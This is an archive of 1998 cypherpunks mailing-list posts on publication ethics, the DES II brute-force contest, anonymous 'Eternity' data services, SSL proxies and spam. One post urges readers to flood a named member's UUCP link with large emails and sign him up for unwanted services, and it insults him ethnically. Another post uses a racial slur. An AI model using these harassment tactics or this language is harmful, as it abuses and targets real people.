Lubachevsky, like Gauss, chose not to publish contraversial ideas?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 00:08:40 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <34B85EED.2D12492D@avana.net>
Message-ID: <LLe6ie65w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



David Miller <dm0@avana.net> writes:

> > ... If an art critic declines
> > to publish something, its a loss probably only to his fellow art critics,
> > but if a mathematician or a biologist or a physicist doesn't publish, it's
> > a loss for more than just his colleagues.
>
> The author has a skewed view which says that science is more important
> than
> art.  Simply not true.  Don't get too narrow a view of "progress".

David, you need to learn to read.

"Art critic" != art, just like "lit crit" != literature.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 00:07:31 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.32.19980111001654.007047c8@cnw.com>
Message-ID: <iqe6ie66w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Blanc <blancw@cnw.com> writes:

> Dr.Dimitri Vulis KOTM wrote:
>
> >Not just the scientific community... everyone. If an art critic declines
> >to publish something, its a loss probably only to his fellow art critics,
> >but if a mathematician or a biologist or a physicist doesn't publish, it's
> >a loss for more than just his colleagues.
> .........................................................................
>
> There is a sense of loss of valuable information, once you know that it
> existed before you knew about it.   Of course, there are a million and one
> things that we don't know today that we wish we knew, and which could help
> everyone who has the need for that special knowledge.
>
> 1) But it is also true that the Truth (the facts of nature and principles
> on what is possible - in mathematics, or any scientific pursuit) does not
> "go away" simply because one person's discovery is not conveyed to
> everyone.  It remains true and in existence, waiting for anyone else to do
> the work of discovery, or for mankind itself to evolve into the kind of
> creature whose mind can grasp the principles involved.   It is a loss not
> to know the achievements of a great scientist's work, but the facts
> themselves are not lost, they remain available for anyone who can think as
> well, to find them.

Think of Leonardo da Vinci's portrait of Mona Lisa. For
reasons unknown to me, computer geeks like to use it in digitized form as
an example of art. Had it been kept in the Versailles during the french
revolution, it probably would have been looted and destroyed by the mobs.
If that happened, computer geeks probably would be using some other
famous work of art at their art fetish; perhaps the birth of venus
because there the woman is nekkid(!). If some art critic (professional
or amateur) expressed an opinion as to why computer geeks like Mona Lisa,
that opinion would probably be of no consequence.  And if Isaac Newton
chose to write principa in english, rather than latin, it probably would
have contained the same mathematical ideas.

> 2) Scientists and other very original, competent people like to think they
> can do as well as any one else, and I imagine sometimes they consider
> insulting the proposition that they must depend upon the work of another in
> order to achieve understanding; that without it they would be unable to do
> as well.  Isn't this one of the reasons for some of the conflicts between
> scientists over originality, and the jealousy over recognition?

That's why the society/the species benefits when scientific ideas are
published and disseminated: other scientists exposed to these ideas
come up with ideas of their own.

> I went to an exhibit yesterday of Leonardo da Vinci, where I saw the 400
> year old Codex Leicester.   He was "a keen observer" of Nature, and from
> his detailed studies he learned much which provided his inventive mind with
> much material for creative works.   The exhibit brings to mind not only his
> work, but the methods of such a great mind in reaching those heights and
> breadths.
>
> So in relation to this debate on the morality of not sharing:  would it not
> be as good a thing to look toward method - to value and promote the ability
> to know how to think, how to observe properly, how to understand what is
> before oneself - than merely to consider ourselves dependent upon the
> _result_ of the work of certain others, bewailing their insensitivity when
> they fail to share with us what they obtained for themselves?  Because this
> does go in the direction of thinking in terms of "obligation", which is
> rather unappreciative of their unique & separate identity.

You're missing my point. If the society would benefit from a certain behavior,
it should not rely on coercion, but use economic motivation to encourage it.
Clearly NSF doesn't work any better than NEA.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Trei Family <trei@relay-1.ziplink.net>
Date: Sun, 11 Jan 1998 23:48:04 +0800
To: coderpunks@toad.com
Subject: More on the DES II contest.
Message-ID: <3.0.1.32.19980111103458.006a3184@pop3.ziplink.net>
MIME-Version: 1.0
Content-Type: text/plain



Douglas F. Elznic and Lucky Green have both written saying 
that www.distributed.net will not be devoting their full 
effort to the DES II challenge.

This is incorrect. 

www.distributed.net is a highly centralized effort, in which
clients are almost completely controlled by the central site,
with which they are in frequent communication.

Over the past few weeks, the clients have been upgraded to a
version containing dual search cores - they can search either
rc5-64 or an arbitrary DES key.

On the morning of the 13th, as soon as the DES II challenge 
data becomes available, their servers will stop issuing 
rc5-64 blocks and start issuing DES II blocks. The clients
will all switch over to the DES II contest without any action
by the owners of the client machines.

I too would like to see a serious effort made at a 512 bit
RSA key. However, the infrastructure for this is quite a 
bit more complex than a simple bruteforce against a 
symmetric key, and the organizers of d.n don't seem to be
ready for it.

My greatest fear with DES II is that if d.n finds the key
early in the search, they may decide to sit on it until 
just before the 540 hour deadline. If they are the only
group with a credible chance of finding the key (as far as
I know, this is the case), then their payback is maximized
by by this tactic, since the time limits for the June
contest are determined by the speed with which the key is
found in January.

My personal impression is that d.n seems more motivated
by the money, which they want to further their research
on distributed computing, than they are by ideology.

The above represent my personal, private views, and
should neccesarily be attributed to my employer.

Peter Trei
trei@ziplink.net
ptrei@hotmail.com (more reliable next week)


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 12 Jan 1998 00:13:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801111639.KAA18272@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: rant on the morality of confidentiality (fwd)
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Sun, 11 Jan 98 10:08:56 EST

> David, you need to learn to read.
> 
> "Art critic" != art, just like "lit crit" != literature.

And you need to pay more attention as well. Being an art critic does not
exclude the art in the act of critical review. The expression of emotional
and intellectual consequence of the piece under review requires a creative
act just as valid as the creation of the piece under review.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 12 Jan 1998 00:18:12 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801111642.KAA18314@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: rant on the morality of confidentiality (fwd)
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Sun, 11 Jan 98 09:51:22 EST

> You don't seem to realize that the likelyhood of someone independently
> rediscovering a "lost" math result is much less than the likelyhood of
> two people independently creating substantially similar works of art.

Malarky, the history of science (and of human civilizations) is replete with
example after example of idividuals discovering the same basic theme and its
proof. Just the three examples we have been using (Newton, Gauss, Fermat)
are filled with comments about contemporaries discovering the same result.
Review Darwin for a moment, he chose to share the fame for evolutionary
theory with Wallace because he had reached the same conclusion. Had either
Darwin or Wallace not chose to publish the result would still have been
found and shared.

> For example, all of T.S.Elliot's poetry is substantially similar to
> Walt Whitman's poetry. They are, for most intents and purposes, mutually
> interchangeable. (Emily "lick my bud" Dickinson is almost interchangeable.)

Only in the context that they are both poets who write poetry.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 12 Jan 1998 04:08:50 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: A further thought on free markets & anarchy...
In-Reply-To: <199801110542.XAA16327@einstein.ssz.com>
Message-ID: <3.0.5.32.19980111114033.008afae0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



If you begin by assuming that a free market will automagically acquire
someone with monopoly control who can prevent all competitors from acting,
you've got a rather different view of free markets than I do,
and you're basically assuming that anarchy is unmaintainable in economies,
from which the obvious conclusion is "so don't even try."
There are people who believe the same about political anarchy.

However, I don't see you presenting any reasoning for the belief
that a free market will become non-free and acquire a head.
Rather the opposite appears to have been the case in most environments
where the economic actors don't have political actors supporting
their bids for monopoly.

At 11:42 PM 1/10/98 -0600, Jim Choate wrote:
>Given that anarchist don't support a 'head' in regards to human activities
>*and* that a free market monopolizes thus creating a 'head' it is clear 
>that if we apply the ideas of human society (ie political systems) to
>economics we derive a fundamental conflict, that a anarchist in the economic
>sphere is left with no choice but to agree that economic systems must be
>managed and creates a 'head' either by plan or monopolistic fiat.
>
>Therefore the original thesis that such political models are applicable to
>economic ones is flawed. It simply is not possible for an economic system to
>exhist without some sort of 'head' or guiding structure. This is
>fundamentaly at odds with the definition and spirit of anarchy.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 12 Jan 1998 01:47:01 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Eternity Services (fwd)
Message-ID: <199801111813.MAA18576@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 11 Jan 1998 09:39:00 -0800
> From: Tim May <tcmay@got.net>
> Subject: Eternity Services

> under privacy laws, the ECPA, etc. We have not seen any major court orders
> directed at remailers, but I expect them soon.

Tell that to Julf.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 12 Jan 1998 05:42:10 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: Adding SSL to things
In-Reply-To: <"Raymond D. Mereniuk"'s message of Sat, 10 Jan 1998 20:05:03 +0000>
Message-ID: <3.0.5.32.19980111132145.00883540@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:11 AM 1/11/98 -0500, Ryan Lackey wrote:
>Does anyone know of a way I can take a web server, say AOLserver, which
>does not support useful SSL, and also does not distribute source, and
>retrofit a useful 128-bit SSL implementation to it?  It has a C API, but
>I haven't looked at the API enough to see if I could do it within the API.
>Are there any proxies which could be stuck between the insecure server
>and the user (preferably with an ssh link between the servers) which could
>provide SSL proxy service?  It seems like this should be trivial to do,
>but I haven't tried yet, and I want to have some reedeming value for this
>post.]

Why not just get a server that _does_ have useful SSL support,
like Apache-SSL (for non-US freeware) or Stronghold (for US commercial use)?
There are workarounds out there for undersecure clients,
like SafePassage and some German Java applet, but that's the easy side.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Mon, 12 Jan 1998 03:27:31 +0800
To: cypherpunks@toad.com
Subject: Re: Congratulations!
Message-ID: <29c1c353e00d6e916744745acc2ece93@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 02:06 01/11/98 -0800, WebSoft Associates, wrote:
 
> We at WebSoft Associates (http://www.websoftassoc.com) would like to
> congratulate you on your recent selection by Inc. Magazine as
> one of the 500 fastest growing private companies in the United States.

Wow! The cypherpunks are a fucking business? Am I a stock holder?

Ha-fucking-ha!

Is this line supposed to convince us that this was a targeted e-mail and *not*
spam! <LOL>  Normally I just trash this stuff, but I really got a kick out of
that.  I hope we can get to top 100 by the fall '98 <bg>











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 12 Jan 1998 03:57:26 +0800
To: cypherpunks@toad.com
Subject: Dimitry Vulis need attention again
Message-ID: <199801111946.OAA02193@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
   >           id AA29722 for ; Sat, 10 Jan 98 10:24:07 -0500
   >   Received: by bwalk.dm.com (1.65/waf)
   >   	via UUCP; Sat, 10 Jan 98 10:03:36 EST
   >   	for cypherpunks@toad.com
   >   To: cypherpunks@toad.com
   >   Subject: Re: your mail
   >   From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
   >   
   >   Anonymous <nobody@REPLAY.COM> writes:
   >   
   >   > >On Thu, 8 Jan 1998 13:54:41 -0700 (MST) Graham-John Bullers
   >   > ><real@freenet.edmonton.ab.ca> writes:
   >   > >>On Thu, 8 Jan 1998, Mix wrote:
   >   > >>
   >   > >>I think Vulis needs each of us to send ten copies of this back to him.
   >   > >
   >   > >I think so too what's his email address?????
   >   > >
   >   > >
   >   > >
   >   > >Anonymous304
   >   >
   >   > Uh, you subscribe to the list but you can't find Vulis' address? Just how
   >   > stupid are you?
   >   
   >   Guy Polis is indeed very stupid.  His former colleagues at J.P.Morgan
   >   and Salomon bros, where he used to be a consultant, remember him as
   >   a very stupid guy.

"Polis" is an arcane Scandanavian (sic) word for "Police".

That's as creative as Ukranian-Romainian-Gypsie Vulis can do.

Vulis couldn't even hack it in Manhatten, and had to leave.

His brother, Michael, said the family disowns Dimitry as the asshole
of the family line.

----

Regarding emailing Vulis to show him some appreciation: as you can see
from the headers, he is so disliked that he needs to connect to the
Net using UUCP!

   HA HA HA HA HA HA HA HA

And so, he has to download his mail before filtering/reading it, and
domain 'dm.com' is MX wild-carded to accept all references.

So, wouldn't it be funny if people started signed _him_ up for
Eureka, Russian Jewish Singles dating, etc?

Also, simply sending him largish missives will tie up his
poor UUCP link. So, if it doesn't violate your local TOS,
I think all of us should let Dr. Dim hear about it until
he cleans up his act.

---guy

   fool@dm.com fool@bwalk.dm.com gypsie@bwalk.dm.com MaysRevenge@bwalk.dm.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 12 Jan 1998 07:52:03 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Eternity Services
In-Reply-To: <v03102800b0deac61cffd@[207.167.93.63]>
Message-ID: <v03102801b0df03d95cd4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:06 PM -0800 1/11/98, Adam Back wrote:

>Archiving USENET as a separable enterprise which charges for access
>(altavista for example charges via advertisements) seems less
>problematic than directly trying to build a database of controversial
>materials.  Archiving it all partly reduces your liability I think,
>because you are not being selective, you just happen to have a
>business which archives USENET.  However there are two problems with
>this: a) volume -- USENET daily volume is huge; b) the censors will
>ask you to remove articles they object to from the archive.

News spool services are already showing signs of getting into this "Usenet
censorship" business in a bigger way. Some news spool services honor
cancellations (and some don't).  Some don't carry the "sensitive"
newsgroups. And so on. Nothing in their setup really exempts them from
child porn prosecutions--no more so than a bookstore or video store is
exempted, as the various busts of bookstores and whatnot show, including
the "Tin Drum" video rental case in Oklahoma City.


>The solution I am using is to keep reposting articles via remailers.
>Have agents which you pay to repost.  This presents the illusion of

This of course doesn't scale at all well. It is semi-OK for a tiny, sparse
set of reposted items, but fails utterly for larger database sets. (If and
when Adam's reposted volumes begin to get significant, he will be viewed as
a spammer. :-) )

>> - CD-ROMS made of Eternity files and then sold or distributed widely
>
>This is an interesting suggestion, but surely would open the
>distributor up for liability, especially if copyright software were
>amongst the documents.  Were you thinking of
>

The CD-ROM distribution is just a side aspect, to get some set of data
widely dispersed. For example, if the data base is of "abortion" or
"euthanasia" information (a la Hemlock Society), which various parties want
suppressed, then handing out freebie CD-ROMs is one step.

Many examples of this: Samizdats in Russia, crypto/PGP diskettes handed out
at conferences (was Ray Arachelian doing this several years ago?), and
various religious and social tracts. Obviously, this is what broadsheets
and fliers are designed to do. Self-publishing in general.

If the intent is to collect money for the data base accesses, then of
course other considerations come into play.

(Critical to these "Eternity" things is a good model of the customers, the
reasons for the data, etc.)



>> - purely cyberspatial locations, with no know nexus
>>
>> (I point to my own "BlackNet" experiment as one approach.)
>
>This is the best option.  Make it entirely distributed, so there is no
>nexus, period.  cyberspacial -> meatspace mappings are often easier to
>trace than we would wish, especially where there is continued usage
>(for example there are various active attacks which can make progress
>even against mixmaster remailers).  This is the weak point of my
>reposting agent, be that human, or automated.

My model, contained in the actual working software (*), allowed customers
to pick some topic, enclose a public key and payment, use a remailer to
post, then collect the information some time later. Using Usenet, but not
by reposting the actual data. Only pointers.

(* I say "working" in the sense that the concept was very easy to
demonstrate just by using PGP and remailers. Not much more than what I
demonstrated in 1993 would be needed to deploy a real system. Except for
one thing: true digital cash. Not the bullshit one-way-traceable stuff that
Chaum and others are now pushing, but the original, online-cleared or
escrow-cleared form, a la the work of Goldberg et. al. For some of these
applications, below, simple token- or coupon-based schemes might work
adequately.)

How these models will work using existing infrastructure (Usenet,
remailers, Web proxies, etc.) depends on some factors. It might be useful
to consider some benchmark applications, such as:

1. Anonymous purchase of financially important data. (A good example being
the Arbitron ratings for radio markets...subscription to Arbitron is quite
expensive, and posting of results on Usenet is prosecuted by Arbitron. A
good example of a BlackNet market.)

2. Anonymous purchase of long articles, e.g., encycopedia results...

(I'm not sure there's still a market for this....)

3. Anonymous purchase of "term papers." (A thriving market for ghostwritten
articles...already migrating to the Web, but lacking adequate anonymizing
methods.)

This is an example of a very large data base (all term papers on file)
which cannot possibly by distributed feasibly by Usenet.

And so on...lots of various examples.

The whole Eternity thing is interesting, but we haven't made a lot of
progress, it seems to me. (I distributed a proposal a bit similar to what
Ross Anderson was proposing, a proposal more oriented toward making a
_persistent_ Web URL for academics and lawyers to reliably cite, with less
of the "404--File Not Found" sorts of messages, the things which make the
Web largely unusable for academic and scientific citations.)


>> It is also likely in the extreme that a working Eternity service will
>> quickly be hit with attackers of various sorts who want to test the limits
>> of the service, or who want such services shut down.
>
>I agree with this prediction.  Remailers have seen this pattern, with
>`baiting' of operators, and apparently people posting controversial
>materials and reporting the materials to the SPA or others themselves,
>etc.

Yep, it's hard to disagree with this. Any centralized "Eternity service"
will be hit with various kinds of attacks in quick order.

Building a data base, as Ryan comments seem to indicate he is mostly
interested in doing, is the least of the concerns.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Tue, 13 Jan 1998 06:32:09 +0800
To: lord_buttmonkey@juno.com (Matthew L Bennett)
Subject: Re: Spam
In-Reply-To: <l03020901b0dd558f496e@[209.130.131.105]>
Message-ID: <l03020901b0ded4fdda62@[209.130.130.104]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>>I'm hoping you guys would know where I could find out
>>more about this individual -- I'm hoping that he does
>>in fact buy his service from someone else, and if so,
>>I'm not sure how to find that out.  If he doesn't, is
>>there anything I can do?
>  ^^^^^^^^^^^^^^^^^^^^^^^^^
>
>Yeah, there is.
>
>Delete the friggin e-mail like a sensible person.
>
>I get a lot of spam every day, but I just delete it and go on with my
>life.

Look, I realize I was probably asking a stupid question, but
you don't have to be quick with me.  I figured that there were
some things that I could do that I simply didn't know about,
beyond the simplicity of returning the spam the postmaster, root,
and abuse account of the last ISP the spam was routed through.

My interest isn't simply in getting rid of the spam.  "Empty
Trash" is a pretty simple concept on Eudora.  What I want to do
is fight the flow -- and while there may be as many as 10 spammers
per ISP out there, every spam I do something about is one less
server that accepts messages for routing that don't come from one
of their accounts.

If that doesn't make sense to you, don't bother answering the
e-mail next time, eh?

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNLqJ2ABMw4+NR29ZAQG0YAf/ZJ0mbwUKZYJH9f6MHxjVUcGmr4C0GLNB
v0CaGBYx51vZhUxbpS8DQUzJLB/wOY1B+8XSgBH0j6TxOyUqygn4Nmiju4cKE6Tm
1T95PM0rWxvHNUT91PDgy6Lxb+8r54w6jj1HhjpNwJScNJwF4+qB1+TuZDZAW0+e
bmOSlq3w57GuO9+z1l87AVbS1ulu8UlileQDW6gZBdYWflvappFXfkUdde/N+j6r
CMVUR7gkF4WVBWGJuce1GMpy1KnQWCdU9nswNDps0/R7CeicxhpFe98qAGVdCuiw
jUX9blcjA708xMHwfY4saJ3PDpzY/efQ3W7LDYfsjhXcg/Cc3klhKA==
=VRUN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 12 Jan 1998 08:13:29 +0800
To: David Miller <cypherpunks@Algebra.COM
Subject: Re: Eternity Services
In-Reply-To: <v03102800b0deac61cffd@[207.167.93.63]>
Message-ID: <v03102802b0df0e44cf70@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:35 PM -0800 1/11/98, David Miller wrote:

>There is one thing that comes to mind that was just a topic covered on
>this
>list and that is the use of cellular/wireless/RF/ham for connections to
>said machines.
>
>Obviously, this would make seizure more difficult (and perhaps increase
>the
>likelyhood of prior warning, if for example, cellular service was
>suddenly
>cut off).

In terms of "work factor," such connections are nearly worthless. They
might be a bit harder to trap or trace than typical connections, but they
are only "security through obscurity" compared to the effort to break a
typical cipher.

(Put another way, would you feel safe hosting a child porn site just
because some of the links were over ham radio or the like? I wouldn't. I'd
be waiting for the FCC vans to triangulate....or for the cellphone
companies to "cooperate," as they so often have.)


--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Tue, 13 Jan 1998 06:32:04 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <19971226.145900.12766.0.Lord_Buttmonkey@juno.com>
Message-ID: <l03020905b0dedc388d2e@[209.130.130.104]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 8:26 PM -0800 1/10/98, Bill Stewart wrote:
>>>> Umm, no, freedom doesn't work like that.  If you open a *private*
>>>> establishment, you have the right, according to the constitution, to
>>>> deny *anyone* the right to enter or eat in your restraunt.
>
>I don't see freedom of association listed anywhere there;
>you might construe it as a "taking" or something, but it'd be a stretch.
>Also, there was a really appalling court case in the 1890s
>(Plessey vs. Ferguson), in which the Supremes ruled that states
>could require segregation with separate but equal accommodations;
>it was somewhat overturned by Brown vs. Board of Education in 1954,
>but the idea that the government can tell you how to run your business
>is long established (after all, we'd need much smaller governments
>if they couldn't be interfering in business.)

Firstly, something being long-established doesn't make it right.
SO, let's look at it this way, regarding the freedom of association.

You have the freedom to associate with whom you choose, don't you
think?  It's not in the constitution, but you would throw a fit if
Uncle Sam told you that it was illegal for you to go play baseball
with little Billy if little Billy was black and you were white.

AND, in my not so humble opinion, If you have the freedom to play
with little Billy, then you have the freedom to tell little Billy
to go fuck himself because you refuse to play with "niggers."

Sam Adams (as it may or may not have been mentioned on this list)
himself had a problem with our constitution -- he didn't think that
it was right for the people to ratify the bill of rights, thereby
protecting certain rights under the constitution.  Why?  Simple.

He was of the mind that setting our rights, such as the right to
free speech, in concrete meant that anything NOT set in concrete
wasn't a right -- he felt that by ratifying the bill of rights,
rather than using logic as I did above, we were actually LIMITING
our rights as freely roaming human beings.

>>>Tell that to Denney's restaurants. (No, not in the United Fascist
>>>States of Amerika you can't.)
>
>>Apologies.  In *theory* you have those rights, on *paper*, you have those
>>rights, but in *practice*, you're correct, the Government has power that
>>it gleefully abuses, forcing others to comply w/ political correctness.
>>
>>I'd like some more info on this Denny's thing.
>
>A Denny's restaurant in Maryland had two groups of customers
>show up one day, one group black, one group white, both about 6-8 people,
>both arriving at the same time, both groups out-of-uniform cops.
>The white people got served promptly, the blacks got served
>extremely late and rudely.  And sued, and won.

Sadly, America has become less of a home to the free and the brave,
and more of a home to the pissed and the laywers.  I remember an
experience where I was lounging in a booth at a Perkins with a few
friends of mine.  Two of them were sitting on one side (they were
dating at the time), and I was stretched across the cushion on the
other side.

The manager came up to me and told me to sit up straight, or he
would ask me to leave.  I lit a cigarette and told him to go fuck
himself.  He asked me to leave.  I did so, my friends in tow, and
we refused to pay the $40 bill on our way out.

America should be about not taking any shit from anybody -- not
because you can sue, but because you have enough attitude to realize
when the other guy's being an idiot, and because you have enough
balls to tell him so.

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNLqKEgBMw4+NR29ZAQHQkQgAzyup+DhoMDPRPuXPS36o7qjRBAbfcxPG
Rwyme05AjYo4v/VUIAcP0fCrw2PTWD3X3H7xRDRqq5YP/U3ZCZa/S63uMtdoe7bf
to2zfCVFcD0ym6765XCnV4iYsp7+VlTFSGNzCw5ur0S25wwztg774XlM1bjpiw5N
pF9g67DSOMRfJqWyeMrcw6QUcon6LJR0+HU6VmNdvisxBQd5sdh7WoKw+VCklCjE
KFRvfxgmFVgoM8sBxUKyI6U0X3HqWZS8PwRQZFr5B6YT3duFn6AEdr9EInbZL8/p
fCaQTt3jb95DBnHEipYEsq0bSpI3+f603/qoSGPrgvjoRuOXwq491A==
=dML4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 12 Jan 1998 09:16:06 +0800
To: cypherpunks@Algebra.COM
Subject: BlackNet
Message-ID: <v03102804b0df1be302d4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Someone just asked me for an explanation of "BlackNet," as he hadn't heard
of it before. There are several places to look:

--a Web search on the term, along with "cypherpunks" or "cryptography" or
my name so as to narrow down the search somewhat (apparently some persons
of color decided to use BlackNet as their group's name, thus leading to
some collisions_

--archives of the list, partially available at
http://infinity.nus.sg/cypherpunks/

